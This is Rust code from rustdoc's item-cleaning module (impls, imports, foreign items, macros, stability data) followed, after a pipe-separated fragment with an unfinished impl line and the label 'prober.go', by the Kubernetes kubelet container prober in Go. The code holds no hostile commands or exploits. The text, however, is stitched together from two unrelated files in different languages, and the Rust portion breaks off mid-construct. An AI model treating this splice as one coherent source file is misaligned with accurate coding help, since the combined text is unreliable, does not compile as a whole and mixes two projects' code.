            }),
        }
    }
}

/// A `const` item: its type and pretty-printed initializer.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Constant {
    pub type_: Type,
    pub expr: String,
}

impl Clean<Item> for doctree::Constant {
    fn clean(&self, cx: &DocContext) -> Item {
        Item {
            name: Some(self.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner: ConstantItem(Constant {
                type_: self.type_.clean(cx),
                expr: print_const_expr(cx, self.expr),
            }),
        }
    }
}
/// Whether a pointer/reference/static is mutable.
#[derive(Debug, Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Copy, Hash)]
pub enum Mutability {
    Mutable,
    Immutable,
}
impl Clean<Mutability> for hir::Mutability {
    // Direct one-to-one mapping from the HIR mutability flag.
    fn clean(&self, _: &DocContext) -> Mutability {
        match *self {
            hir::MutMutable => Mutable,
            hir::MutImmutable => Immutable,
        }
    }
}
/// Whether an impl is positive (`impl Trait for T`) or negative (`impl !Trait for T`).
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Copy, Debug, Hash)]
pub enum ImplPolarity {
    Positive,
    Negative,
}
impl Clean<ImplPolarity> for hir::ImplPolarity {
    // Direct one-to-one mapping from the HIR polarity.
    fn clean(&self, _: &DocContext) -> ImplPolarity {
        match *self {
            hir::ImplPolarity::Positive => ImplPolarity::Positive,
            hir::ImplPolarity::Negative => ImplPolarity::Negative,
        }
    }
}
/// A cleaned `impl` block: `impl<generics> Trait for Type { items }`.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Impl {
    pub unsafety: hir::Unsafety,
    pub generics: Generics,
    /// Names of trait methods that have default bodies in the trait itself.
    pub provided_trait_methods: FxHashSet<String>,
    /// `None` for inherent impls.
    pub trait_: Option<Type>,
    pub for_: Type,
    pub items: Vec<Item>,
    pub polarity: Option<ImplPolarity>,
    /// `true` if this impl was synthesized (e.g. auto-trait impls).
    pub synthetic: bool,
}

// Synthesize auto-trait impls for a local item identified by NodeId.
pub fn get_auto_traits_with_node_id(cx: &DocContext, id: ast::NodeId, name: String) -> Vec<Item> {
    let finder = AutoTraitFinder::new(cx);
    finder.get_with_node_id(id, name)
}

// Synthesize auto-trait impls for an item identified by DefId.
pub fn get_auto_traits_with_def_id(cx: &DocContext, id: DefId) -> Vec<Item> {
    let finder = AutoTraitFinder::new(cx);
    finder.get_with_def_id(id)
}
impl Clean<Vec<Item>> for doctree::Impl {
    // Clean an impl block. May yield more than one item: a `Deref` impl also
    // pulls in the deref target's inherent impls.
    fn clean(&self, cx: &DocContext) -> Vec<Item> {
        let mut ret = Vec::new();
        let trait_ = self.trait_.clean(cx);
        let items = self.items.clean(cx);

        // If this impl block is an implementation of the Deref trait, then we
        // need to try inlining the target's inherent impl blocks as well.
        if trait_.def_id() == cx.tcx.lang_items().deref_trait() {
            build_deref_target_impls(cx, &items, &mut ret);
        }

        // Record which trait methods are provided (defaulted) so the renderer
        // can distinguish them from required ones.
        let provided = trait_.def_id().map(|did| {
            cx.tcx.provided_trait_methods(did)
                  .into_iter()
                  .map(|meth| meth.ident.to_string())
                  .collect()
        }).unwrap_or(FxHashSet());

        ret.push(Item {
            name: None,
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner: ImplItem(Impl {
                unsafety: self.unsafety,
                generics: self.generics.clean(cx),
                provided_trait_methods: provided,
                trait_,
                for_: self.for_.clean(cx),
                items,
                polarity: Some(self.polarity.clean(cx)),
                synthetic: false,
            })
        });
        ret
    }
}
// For a `Deref` impl, inline the impls of the deref *target* so its methods
// show up on the derefing type's page. The target is found via the impl's
// associated `type Target = ...` (a `TypedefItem(_, true)` item).
fn build_deref_target_impls(cx: &DocContext,
                            items: &[Item],
                            ret: &mut Vec<Item>) {
    use self::PrimitiveType::*;
    let tcx = cx.tcx;

    for item in items {
        let target = match item.inner {
            TypedefItem(ref t, true) => &t.type_,
            _ => continue,
        };
        let primitive = match *target {
            // Local targets already have their impls documented in this crate.
            ResolvedPath { did, .. } if did.is_local() => continue,
            ResolvedPath { did, .. } => {
                // We set the last parameter to false to avoid looking for auto-impls for traits
                // and therefore avoid an ICE.
                // The reason behind this is that auto-traits don't propagate through Deref so
                // we're not supposed to synthesise impls for them.
                ret.extend(inline::build_impls(cx, did, false));
                continue
            }
            _ => match target.primitive_type() {
                Some(prim) => prim,
                None => continue,
            }
        };
        // Primitive targets: map each primitive to the lang item carrying its
        // inherent impl, if any.
        let did = match primitive {
            Isize => tcx.lang_items().isize_impl(),
            I8 => tcx.lang_items().i8_impl(),
            I16 => tcx.lang_items().i16_impl(),
            I32 => tcx.lang_items().i32_impl(),
            I64 => tcx.lang_items().i64_impl(),
            I128 => tcx.lang_items().i128_impl(),
            Usize => tcx.lang_items().usize_impl(),
            U8 => tcx.lang_items().u8_impl(),
            U16 => tcx.lang_items().u16_impl(),
            U32 => tcx.lang_items().u32_impl(),
            U64 => tcx.lang_items().u64_impl(),
            U128 => tcx.lang_items().u128_impl(),
            F32 => tcx.lang_items().f32_impl(),
            F64 => tcx.lang_items().f64_impl(),
            Char => tcx.lang_items().char_impl(),
            Bool => None,
            Str => tcx.lang_items().str_impl(),
            Slice => tcx.lang_items().slice_impl(),
            // NOTE(review): arrays reuse the slice impl here — confirm intended.
            Array => tcx.lang_items().slice_impl(),
            Tuple => None,
            Unit => None,
            RawPointer => tcx.lang_items().const_ptr_impl(),
            Reference => None,
            Fn => None,
            Never => None,
        };
        if let Some(did) = did {
            if !did.is_local() {
                inline::build_impl(cx, did, ret);
            }
        }
    }
}
impl Clean<Item> for doctree::ExternCrate {
    // Clean an `extern crate foo;` item; its DefId points at the external
    // crate's root.
    fn clean(&self, cx: &DocContext) -> Item {
        Item {
            name: None,
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: DefId { krate: self.cnum, index: CRATE_DEF_INDEX },
            visibility: self.vis.clean(cx),
            stability: None,
            deprecation: None,
            inner: ExternCrateItem(self.name.clean(cx), self.path.clone())
        }
    }
}
impl Clean<Vec<Item>> for doctree::Import {
    // Clean a `use` item. A public import may be *inlined*: the target's
    // documentation is copied here and the `use` itself disappears.
    fn clean(&self, cx: &DocContext) -> Vec<Item> {
        // We consider inlining the documentation of `pub use` statements, but we
        // forcefully don't inline if this is not public or if the
        // #[doc(no_inline)] attribute is present.
        // Don't inline doc(hidden) imports so they can be stripped at a later stage.
        let denied = !self.vis.node.is_pub() || self.attrs.iter().any(|a| {
            a.name() == "doc" && match a.meta_item_list() {
                Some(l) => attr::list_contains_name(&l, "no_inline") ||
                           attr::list_contains_name(&l, "hidden"),
                None => false,
            }
        });
        let path = self.path.clean(cx);
        let inner = if self.glob {
            if !denied {
                let mut visited = FxHashSet();
                if let Some(items) = inline::try_inline_glob(cx, path.def, &mut visited) {
                    return items;
                }
            }
            Import::Glob(resolve_use_source(cx, path))
        } else {
            let name = self.name;
            if !denied {
                let mut visited = FxHashSet();
                if let Some(items) = inline::try_inline(cx, path.def, name, &mut visited) {
                    return items;
                }
            }
            Import::Simple(name.clean(cx), resolve_use_source(cx, path))
        };
        // Not inlined: keep a plain import item.
        vec![Item {
            name: None,
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(ast::CRATE_NODE_ID),
            visibility: self.vis.clean(cx),
            stability: None,
            deprecation: None,
            inner: ImportItem(inner)
        }]
    }
}
/// A non-inlined `use` item.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub enum Import {
    // use source as str;
    Simple(String, ImportSource),
    // use source::*;
    Glob(ImportSource)
}

/// The target of a `use`: its path and, when resolved, its DefId.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct ImportSource {
    pub path: Path,
    pub did: Option<DefId>,
}
impl Clean<Vec<Item>> for hir::ForeignMod {
    /// Clean an `extern { ... }` block, propagating the block's ABI onto each
    /// foreign function inside it.
    fn clean(&self, cx: &DocContext) -> Vec<Item> {
        let mut cleaned = self.items.clean(cx);
        for item in cleaned.iter_mut() {
            if let ForeignFunctionItem(ref mut func) = item.inner {
                func.header.abi = self.abi;
            }
        }
        cleaned
    }
}
impl Clean<Item> for hir::ForeignItem {
    // Clean one item of an `extern` block: a function, a static, or a foreign type.
    fn clean(&self, cx: &DocContext) -> Item {
        let inner = match self.node {
            hir::ForeignItemFn(ref decl, ref names, ref generics) => {
                let (generics, decl) = enter_impl_trait(cx, || {
                    (generics.clean(cx), (&**decl, &names[..]).clean(cx))
                });
                ForeignFunctionItem(Function {
                    decl,
                    generics,
                    // Synthesize a header: foreign fns are recorded as unsafe
                    // here, and the ABI is overwritten later by the enclosing
                    // `ForeignMod`'s clean (see Clean for hir::ForeignMod).
                    header: hir::FnHeader {
                        unsafety: hir::Unsafety::Unsafe,
                        abi: Abi::Rust,
                        constness: hir::Constness::NotConst,
                        asyncness: hir::IsAsync::NotAsync,
                    },
                })
            }
            hir::ForeignItemStatic(ref ty, mutbl) => {
                ForeignStaticItem(Static {
                    type_: ty.clean(cx),
                    mutability: if mutbl {Mutable} else {Immutable},
                    // Foreign statics have no initializer to show.
                    expr: "".to_string(),
                })
            }
            hir::ForeignItemType => {
                ForeignTypeItem
            }
        };
        Item {
            name: Some(self.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.span.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
            deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
            inner,
        }
    }
}
// Utilities

/// Render something back to its source-code text.
trait ToSource {
    fn to_src(&self, cx: &DocContext) -> String;
}

impl ToSource for syntax_pos::Span {
    // Fetch the literal source snippet covered by this span; empty string if
    // the snippet is unavailable.
    fn to_src(&self, cx: &DocContext) -> String {
        debug!("converting span {:?} to snippet", self.clean(cx));
        let sn = match cx.sess().codemap().span_to_snippet(*self) {
            Ok(x) => x.to_string(),
            Err(_) => "".to_string()
        };
        debug!("got snippet {}", sn);
        sn
    }
}
// Derive a display name for a function argument from its pattern, recursing
// through struct/tuple/slice patterns as needed.
fn name_from_pat(p: &hir::Pat) -> String {
    use rustc::hir::*;
    debug!("Trying to get a name from pattern: {:?}", p);

    match p.node {
        PatKind::Wild => "_".to_string(),
        PatKind::Binding(_, _, ident, _) => ident.to_string(),
        PatKind::TupleStruct(ref p, ..) | PatKind::Path(ref p) => qpath_to_string(p),
        PatKind::Struct(ref name, ref fields, etc) => {
            format!("{} {{ {}{} }}", qpath_to_string(name),
                fields.iter().map(|&Spanned { node: ref fp, .. }|
                                  format!("{}: {}", fp.ident, name_from_pat(&*fp.pat)))
                             .collect::<Vec<String>>().join(", "),
                if etc { ", ..." } else { "" }
            )
        }
        PatKind::Tuple(ref elts, _) => format!("({})", elts.iter().map(|p| name_from_pat(&**p))
                                            .collect::<Vec<String>>().join(", ")),
        PatKind::Box(ref p) => name_from_pat(&**p),
        PatKind::Ref(ref p, _) => name_from_pat(&**p),
        // Literal patterns carry no useful name; warn and fall back.
        PatKind::Lit(..) => {
            warn!("tried to get argument name from PatKind::Lit, \
                  which is silly in function arguments");
            "()".to_string()
        },
        // Range patterns cannot appear in function arguments at all.
        PatKind::Range(..) => panic!("tried to get argument name from PatKind::Range, \
                              which is not allowed in function arguments"),
        PatKind::Slice(ref begin, ref mid, ref end) => {
            let begin = begin.iter().map(|p| name_from_pat(&**p));
            let mid = mid.as_ref().map(|p| format!("..{}", name_from_pat(&**p))).into_iter();
            let end = end.iter().map(|p| name_from_pat(&**p));
            format!("[{}]", begin.chain(mid).chain(end).collect::<Vec<_>>().join(", "))
        },
    }
}
// Render a type-level constant as source text: unevaluated constants are
// pretty-printed from their defining body, evaluated ones are formatted.
fn print_const(cx: &DocContext, n: &ty::Const) -> String {
    match n.val {
        ConstValue::Unevaluated(def_id, _) => {
            if let Some(node_id) = cx.tcx.hir.as_local_node_id(def_id) {
                print_const_expr(cx, cx.tcx.hir.body_owned_by(node_id))
            } else {
                inline::print_inlined_const(cx, def_id)
            }
        },
        _ => {
            let mut s = String::new();
            ::rustc::mir::fmt_const_val(&mut s, n).unwrap();
            // array lengths are obviously usize
            if s.ends_with("usize") {
                let n = s.len() - "usize".len();
                s.truncate(n);
            }
            s
        },
    }
}

// Pretty-print the expression of a const/static body.
fn print_const_expr(cx: &DocContext, body: hir::BodyId) -> String {
    cx.tcx.hir.node_to_pretty_string(body.node_id)
}
/// Given a type Path, resolve it to a Type using the TyCtxt
fn resolve_type(cx: &DocContext,
                path: Path,
                id: ast::NodeId) -> Type {
    if id == ast::DUMMY_NODE_ID {
        debug!("resolve_type({:?})", path);
    } else {
        debug!("resolve_type({:?},{:?})", path, id);
    }

    let is_generic = match path.def {
        // Primitives resolve directly to their Type variant.
        Def::PrimTy(p) => match p {
            hir::TyStr => return Primitive(PrimitiveType::Str),
            hir::TyBool => return Primitive(PrimitiveType::Bool),
            hir::TyChar => return Primitive(PrimitiveType::Char),
            hir::TyInt(int_ty) => return Primitive(int_ty.into()),
            hir::TyUint(uint_ty) => return Primitive(uint_ty.into()),
            hir::TyFloat(float_ty) => return Primitive(float_ty.into()),
        },
        // Bare `Self` and bare type parameters become generic placeholders.
        Def::SelfTy(..) if path.segments.len() == 1 => {
            return Generic(keywords::SelfType.name().to_string());
        }
        Def::TyParam(..) if path.segments.len() == 1 => {
            return Generic(format!("{:#}", path));
        }
        Def::SelfTy(..) | Def::TyParam(..) | Def::AssociatedTy(..) => true,
        _ => false,
    };
    let did = register_def(&*cx, path.def);
    ResolvedPath { path: path, typarams: None, did: did, is_generic: is_generic }
}
// Record an external definition so it gets a fully-qualified name (and, for
// traits, its trait data) in the output, returning the DefId to link against.
fn register_def(cx: &DocContext, def: Def) -> DefId {
    debug!("register_def({:?})", def);

    let (did, kind) = match def {
        Def::Fn(i) => (i, TypeKind::Function),
        Def::TyAlias(i) => (i, TypeKind::Typedef),
        Def::Enum(i) => (i, TypeKind::Enum),
        Def::Trait(i) => (i, TypeKind::Trait),
        Def::Struct(i) => (i, TypeKind::Struct),
        Def::Union(i) => (i, TypeKind::Union),
        Def::Mod(i) => (i, TypeKind::Module),
        Def::TyForeign(i) => (i, TypeKind::Foreign),
        Def::Const(i) => (i, TypeKind::Const),
        Def::Static(i, _) => (i, TypeKind::Static),
        // Variants link to their parent enum.
        Def::Variant(i) => (cx.tcx.parent_def_id(i).unwrap(), TypeKind::Enum),
        Def::Macro(i, _) => (i, TypeKind::Macro),
        Def::SelfTy(Some(def_id), _) => (def_id, TypeKind::Trait),
        Def::SelfTy(_, Some(impl_def_id)) => {
            return impl_def_id
        }
        _ => return def.def_id()
    };
    // Local items need no extern bookkeeping.
    if did.is_local() { return did }
    inline::record_extern_fqn(cx, did, kind);
    if let TypeKind::Trait = kind {
        inline::record_extern_trait(cx, did);
    }
    did
}
// Build an ImportSource for a `use` target; an unresolved (`Err`) path has no
// DefId to record.
fn resolve_use_source(cx: &DocContext, path: Path) -> ImportSource {
    let did = match path.def {
        Def::Err => None,
        other => Some(register_def(cx, other)),
    };
    ImportSource { did, path }
}
/// A `macro_rules!` macro: its rendered source and, if re-exported, the crate
/// it came from.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Macro {
    pub source: String,
    pub imported_from: Option<String>,
}

impl Clean<Item> for doctree::Macro {
    fn clean(&self, cx: &DocContext) -> Item {
        let name = self.name.clean(cx);
        Item {
            name: Some(name.clone()),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            // Documented macros are presented as public.
            visibility: Some(Public),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            def_id: self.def_id,
            // Render each rule's matcher with an elided body: `pat => { ... };`.
            inner: MacroItem(Macro {
                source: format!("macro_rules! {} {{\n{}}}",
                                name,
                                self.matchers.iter().map(|span| {
                                    format!("    {} => {{ ... }};\n", span.to_src(cx))
                                }).collect::<String>()),
                imported_from: self.imported_from.clean(cx),
            }),
        }
    }
}
/// Flattened stability information for rendering, with empty strings standing
/// in for absent fields.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Stability {
    pub level: stability::StabilityLevel,
    pub feature: String,
    pub since: String,
    pub deprecated_since: String,
    pub deprecated_reason: String,
    pub unstable_reason: String,
    pub issue: Option<u32>
}

/// Flattened `#[deprecated]` data; absent fields become empty strings.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Deprecation {
    pub since: String,
    pub note: String,
}

impl Clean<Stability> for attr::Stability {
    fn clean(&self, _: &DocContext) -> Stability {
        Stability {
            level: stability::StabilityLevel::from_attr_level(&self.level),
            feature: self.feature.to_string(),
            // `since` only exists on stable items.
            since: match self.level {
                attr::Stable {ref since} => since.to_string(),
                _ => "".to_string(),
            },
            deprecated_since: match self.rustc_depr {
                Some(attr::RustcDeprecation {ref since, ..}) => since.to_string(),
                _=> "".to_string(),
            },
            deprecated_reason: match self.rustc_depr {
                Some(ref depr) => depr.reason.to_string(),
                _ => "".to_string(),
            },
            // Reason and tracking issue only exist on unstable items.
            unstable_reason: match self.level {
                attr::Unstable { reason: Some(ref reason), .. } => reason.to_string(),
                _ => "".to_string(),
            },
            issue: match self.level {
                attr::Unstable {issue, ..} => Some(issue),
                _ => None,
            }
        }
    }
}

impl<'a> Clean<Stability> for &'a attr::Stability {
    // Delegate to the by-value impl.
    fn clean(&self, dc: &DocContext) -> Stability {
        (**self).clean(dc)
    }
}

impl Clean<Deprecation> for attr::Deprecation {
    fn clean(&self, _: &DocContext) -> Deprecation {
        Deprecation {
            since: self.since.as_ref().map_or("".to_string(), |s| s.to_string()),
            note: self.note.as_ref().map_or("".to_string(), |s| s.to_string()),
        }
    }
}
/// An equality constraint on an associated type, e.g. `A=Bar` in `Foo<A=Bar>`
#[derive(Clone, PartialEq, Eq, RustcDecodable, RustcEncodable, Debug, Hash)]
pub struct TypeBinding {
    pub name: String,
    pub ty: Type
}

impl Clean<TypeBinding> for hir::TypeBinding {
    fn clean(&self, cx: &DocContext) -> TypeBinding {
        TypeBinding {
            name: self.ident.name.clean(cx),
            ty: self.ty.clean(cx)
        }
    }
}
// Build the fully-qualified path components of `did`, starting with the crate
// name (overridable via `name`).
pub fn def_id_to_path(cx: &DocContext, did: DefId, name: Option<String>) -> Vec<String> {
    let crate_name = name.unwrap_or_else(|| cx.tcx.crate_name(did.krate).to_string());
    let relative = cx.tcx.def_path(did).data.into_iter().filter_map(|elem| {
        // extern blocks have an empty name
        let component = elem.data.to_string();
        if component.is_empty() {
            None
        } else {
            Some(component)
        }
    });
    once(crate_name).chain(relative).collect()
}
// Run `f` with a fresh (empty) impl-Trait bounds map, restoring the previous
// map afterwards. Asserts that `f` consumed everything it registered.
pub fn enter_impl_trait<F, R>(cx: &DocContext, f: F) -> R
where
    F: FnOnce() -> R,
{
    let old_bounds = mem::replace(&mut *cx.impl_trait_bounds.borrow_mut(), Default::default());
    let r = f();
    assert!(cx.impl_trait_bounds.borrow().is_empty());
    *cx.impl_trait_bounds.borrow_mut() = old_bounds;
    r
}
// Start of code copied from rust-clippy

// Resolve a `::`-separated path to a trait's DefId, searching either the local
// crate or extern crates.
pub fn get_trait_def_id(tcx: &TyCtxt, path: &[&str], use_local: bool) -> Option<DefId> {
    match use_local {
        true => path_to_def_local(tcx, path),
        false => path_to_def(tcx, path),
    }
}
// Walk the local crate's item tree segment by segment, returning the DefId of
// the item named by `path`, or None if any segment fails to resolve.
pub fn path_to_def_local(tcx: &TyCtxt, path: &[&str]) -> Option<DefId> {
    let krate = tcx.hir.krate();
    let mut items = krate.module.item_ids.clone();
    let mut path_it = path.iter().peekable();

    loop {
        let segment = match path_it.next() {
            Some(segment) => segment,
            None => return None,
        };

        for item_id in mem::replace(&mut items, HirVec::new()).iter() {
            let item = tcx.hir.expect_item(item_id.id);
            if item.name == *segment {
                if path_it.peek().is_none() {
                    return Some(tcx.hir.local_def_id(item_id.id))
                }

                items = match &item.node {
                    &hir::ItemMod(ref m) => m.item_ids.clone(),
                    // Fix: the message previously contained `{:?}` placeholders
                    // with no arguments (so the raw format string was printed)
                    // and a stray trailing "path" word.
                    _ => panic!("Unexpected item {:?} in path {:?}", item, path)
                };
                break;
            }
        }
    }
}
// Resolve a path whose first segment is an extern crate name, walking the
// crate's item children. Only trait DefIds are returned for the final segment.
pub fn path_to_def(tcx: &TyCtxt, path: &[&str]) -> Option<DefId> {
    let crates = tcx.crates();

    let krate = crates
        .iter()
        .find(|&&krate| tcx.crate_name(krate) == path[0]);

    if let Some(krate) = krate {
        let krate = DefId {
            krate: *krate,
            index: CRATE_DEF_INDEX,
        };
        let mut items = tcx.item_children(krate);
        let mut path_it = path.iter().skip(1).peekable();

        loop {
            let segment = match path_it.next() {
                Some(segment) => segment,
                None => return None,
            };

            for item in mem::replace(&mut items, Lrc::new(vec![])).iter() {
                if item.ident.name == *segment {
                    if path_it.peek().is_none() {
                        return match item.def {
                            def::Def::Trait(did) => Some(did),
                            _ => None,
                        }
                    }

                    items = tcx.item_children(item.def.def_id());
                    break;
                }
            }
        }
    } else {
        None
    }
}
// Reconstruct an absolute `hir::Path` for `def_id` by replaying its item path
// into a buffer; `def_ctor` wraps the id back into the appropriate `Def`.
fn get_path_for_type<F>(tcx: TyCtxt, def_id: DefId, def_ctor: F) -> hir::Path
    where F: Fn(DefId) -> Def {
    struct AbsolutePathBuffer {
        names: Vec<String>,
    }

    impl ty::item_path::ItemPathBuffer for AbsolutePathBuffer {
        fn root_mode(&self) -> &ty::item_path::RootMode {
            const ABSOLUTE: &'static ty::item_path::RootMode = &ty::item_path::RootMode::Absolute;
            ABSOLUTE
        }

        fn push(&mut self, text: &str) {
            self.names.push(text.to_owned());
        }
    }

    let mut apb = AbsolutePathBuffer { names: vec![] };

    tcx.push_item_path(&mut apb, def_id);

    hir::Path {
        span: DUMMY_SP,
        def: def_ctor(def_id),
        // Segments carry names only; no generic args, no inferred types.
        segments: hir::HirVec::from_vec(apb.names.iter().map(|s| hir::PathSegment {
            ident: ast::Ident::from_str(&s),
            args: None,
            infer_types: false,
        }).collect())
    }
}
// End of code copied from rust-clippy
/// A node in the region-constraint graph used by auto-trait synthesis: either
/// a concrete region or an inference variable.
#[derive(Eq, PartialEq, Hash, Copy, Clone, Debug)]
enum RegionTarget<'tcx> {
    Region(Region<'tcx>),
    RegionVid(RegionVid)
}

/// Outlives edges for one region node.
#[derive(Default, Debug, Clone)]
struct RegionDeps<'tcx> {
    larger: FxHashSet<RegionTarget<'tcx>>,
    smaller: FxHashSet<RegionTarget<'tcx>>
}

/// A simplified generic bound used for comparing bounds structurally.
#[derive(Eq, PartialEq, Hash, Debug)]
enum SimpleBound {
    TraitBound(Vec<PathSegment>, Vec<SimpleBound>, Vec<GenericParamDef>, hir::TraitBoundModifier),
    Outlives(Lifetime),
}

/// Outcome of probing whether a type implements an auto trait.
enum AutoTraitResult {
    ExplicitImpl,
    PositiveImpl(Generics),
    NegativeImpl,
}

impl AutoTraitResult {
    // True for results synthesized by the auto-trait finder (not user-written).
    fn is_auto(&self) -> bool {
        match *self {
            AutoTraitResult::PositiveImpl(_) | AutoTraitResult::NegativeImpl => true,
            _ => false,
        }
    }
}
impl From<GenericBound> for SimpleBound {
    // Flatten a cleaned bound into the structural SimpleBound form. Panics on
    // trait bounds whose trait is not a resolved path.
    fn from(bound: GenericBound) -> Self {
        match bound.clone() {
            GenericBound::Outlives(l) => SimpleBound::Outlives(l),
            GenericBound::TraitBound(t, mod_) => match t.trait_ {
                Type::ResolvedPath { path, typarams, .. } => {
                    SimpleBound::TraitBound(path.segments,
                                            // Recursively simplify the bounds on any typarams.
                                            typarams
                                                .map_or_else(|| Vec::new(), |v| v.iter()
                                                        .map(|p| SimpleBound::from(p.clone()))
                                                        .collect()),
                                            t.generic_params,
                                            mod_)
                }
                _ => panic!("Unexpected bound {:?}", bound),
            }
        }
    }
} | }
impl<'tcx> Clean<Option<Vec<GenericBound>>> for Substs<'tcx> { |
prober.go | /*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package prober
import (
"fmt"
"io"
"net"
"net/http"
"net/url"
"strconv"
"strings"
"time"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"k8s.io/client-go/tools/record"
kubecontainer "k8s.io/kubernetes/pkg/kubelet/container"
"k8s.io/kubernetes/pkg/kubelet/events"
"k8s.io/kubernetes/pkg/kubelet/prober/results"
"k8s.io/kubernetes/pkg/kubelet/util/format"
"k8s.io/kubernetes/pkg/probe"
execprobe "k8s.io/kubernetes/pkg/probe/exec"
httpprobe "k8s.io/kubernetes/pkg/probe/http"
tcpprobe "k8s.io/kubernetes/pkg/probe/tcp"
"k8s.io/utils/exec"
"k8s.io/klog/v2"
)
// maxProbeRetries is the number of attempts runProbeWithRetries makes before
// giving up and reporting the last result.
const maxProbeRetries = 3

// Prober helps to check the liveness/readiness/startup of a container.
type prober struct {
	exec execprobe.Prober
	// probe types needs different httpprobe instances so they don't
	// share a connection pool which can cause collisions to the
	// same host:port and transient failures. See #49740.
	readinessHTTP httpprobe.Prober
	livenessHTTP  httpprobe.Prober
	startupHTTP   httpprobe.Prober
	tcp           tcpprobe.Prober
	runner        kubecontainer.CommandRunner

	// recorder emits container probe events (warnings on failure, etc.).
	recorder record.EventRecorder
}
// NewProber creates a Prober, it takes a command runner and
// several container info managers.
func newProber(
	runner kubecontainer.CommandRunner,
	recorder record.EventRecorder) *prober {

	// Probes must not follow redirects to other hosts.
	const followNonLocalRedirects = false
	p := &prober{
		exec:     execprobe.New(),
		tcp:      tcpprobe.New(),
		runner:   runner,
		recorder: recorder,
	}
	// Separate HTTP probers per probe type; see the field comment on prober.
	p.readinessHTTP = httpprobe.New(followNonLocalRedirects)
	p.livenessHTTP = httpprobe.New(followNonLocalRedirects)
	p.startupHTTP = httpprobe.New(followNonLocalRedirects)
	return p
}
// recordContainerEvent should be used by the prober for all container related events.
func (pb *prober) recordContainerEvent(pod *v1.Pod, container *v1.Container, eventType, reason, message string, args ...interface{}) {
	// Resolve an object reference for the container; without one the event
	// cannot be attached to anything, so it is dropped with a log.
	ref, err := kubecontainer.GenerateContainerRef(pod, container)
	if err != nil {
		klog.ErrorS(err, "Can't make a ref to pod and container", "pod", klog.KObj(pod), "containerName", container.Name)
		return
	}
	pb.recorder.Eventf(ref, eventType, reason, message, args...)
}
// probe probes the container.
// It selects the probe spec matching probeType, runs it with retries, and
// translates the probe outcome into a results.Result, emitting container
// events for failures and warnings.
func (pb *prober) probe(probeType probeType, pod *v1.Pod, status v1.PodStatus, container v1.Container, containerID kubecontainer.ContainerID) (results.Result, error) {
	var probeSpec *v1.Probe
	switch probeType {
	case readiness:
		probeSpec = container.ReadinessProbe
	case liveness:
		probeSpec = container.LivenessProbe
	case startup:
		probeSpec = container.StartupProbe
	default:
		return results.Failure, fmt.Errorf("unknown probe type: %q", probeType)
	}

	// No probe configured: the container is trivially considered healthy.
	if probeSpec == nil {
		klog.InfoS("Probe is nil", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name)
		return results.Success, nil
	}

	result, output, err := pb.runProbeWithRetries(probeType, probeSpec, pod, status, container, containerID, maxProbeRetries)
	if err != nil || (result != probe.Success && result != probe.Warning) {
		// Probe failed in one way or another.
		if err != nil {
			klog.V(1).ErrorS(err, "Probe errored", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name)
			pb.recordContainerEvent(pod, &container, v1.EventTypeWarning, events.ContainerUnhealthy, "%s probe errored: %v", probeType, err)
		} else { // result != probe.Success
			klog.V(1).InfoS("Probe failed", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name, "probeResult", result, "output", output)
			pb.recordContainerEvent(pod, &container, v1.EventTypeWarning, events.ContainerUnhealthy, "%s probe failed: %s", probeType, output)
		}
		return results.Failure, err
	}
	// Success with a warning still counts as Success, but is surfaced via an event.
	if result == probe.Warning {
		pb.recordContainerEvent(pod, &container, v1.EventTypeWarning, events.ContainerProbeWarning, "%s probe warning: %s", probeType, output)
		klog.V(3).InfoS("Probe succeeded with a warning", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name, "output", output)
	} else {
		klog.V(3).InfoS("Probe succeeded", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name)
	}
	return results.Success, nil
}
// runProbeWithRetries tries to probe the container in a finite loop, it returns the last result
// if it never succeeds.
func (pb *prober) runProbeWithRetries(probeType probeType, p *v1.Probe, pod *v1.Pod, status v1.PodStatus, container v1.Container, containerID kubecontainer.ContainerID, retries int) (probe.Result, string, error) {
	var (
		result probe.Result
		output string
		err    error
	)
	for attempt := 0; attempt < retries; attempt++ {
		// A nil error ends the retry loop immediately, whatever the result is.
		if result, output, err = pb.runProbe(probeType, p, pod, status, container, containerID); err == nil {
			return result, output, nil
		}
	}
	return result, output, err
}
